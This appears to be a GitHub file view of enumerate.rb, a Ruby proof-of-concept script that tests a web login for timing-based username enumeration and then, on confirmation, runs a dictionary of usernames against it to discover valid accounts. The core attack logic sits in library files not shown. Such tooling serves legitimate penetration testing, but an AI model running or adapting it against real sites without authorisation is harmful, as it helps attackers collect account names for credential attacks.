-
Notifications
You must be signed in to change notification settings - Fork 1
/
enumerate.rb
81 lines (70 loc) · 2.17 KB
/
enumerate.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
require './lib/constants'
require './lib/options'
require './lib/request'
require './lib/attack'
#
# This is a PoC script that uses basic response-time analysis to determine
# whether a particular function is vulnerable to username enumeration, and if
# so, attempts to exploit it.
#
# Author: John Poulin ([email protected])
#
# Parse options and make sure things are valid
opts = Options.new
opts.parse(ARGV)
unless opts.valid?
puts "!! Error: Options provided are invalid"
exit
end
# Step One:
# => Determine whether the host is vulnerable or not:
# => If we have valid username, then
# => send THRESHOLD requests with valid username
# => send THRESHOLD requests with invalid username
# => compare response time average
# => If valid_average > invalid_average +- MARGIN, then
# => Appears vulnerable
# => exploitable = true
# => else
# => Probably Not Vuln, but try again
# => Else
# => Proceed to step Two with less confidence
if opts.valid_username
attack = Attack.new(DETERMINE_EXPLOITABLE,opts)
attack.start
if attack.is_exploitable
puts "Site appears to be exploitable"
else
puts "Site may not be vulnerable"
end
else
exploitable = LOW_CONFIDENCE
puts "Site may not be vulnerable"
end
# Step Two: Exploitation
# => Iterate over dictionary file
# => Send login request with provided username THRESHOLD times
# => compute average response time
# => if exploitable && unknown_avg_response_time >= valid_average +- MARGIN
# => Mark username as found
# => else if unknown_avg_response_time >= valid_average +- MARGIN
# => Not sure yet
# => end
# => end
# => end
# => Return valid username array
print "Would you like to attempt to exploit #{opts.uri} (y/n)?"
answer = gets.chomp
if answer.downcase == "y"
print "Before we continue please enter new value for margin (#{opts.margin}ms): "
margin = gets.chomp
unless margin.nil? || margin == ""
opts.margin = margin.to_i
end
attack = Attack.new(EXPLOIT, opts)
puts "Attempting to discover user accounts"
attack.exploit
if attack.discovered_accounts.count == 0
puts "No accounts have been discovered"
end
end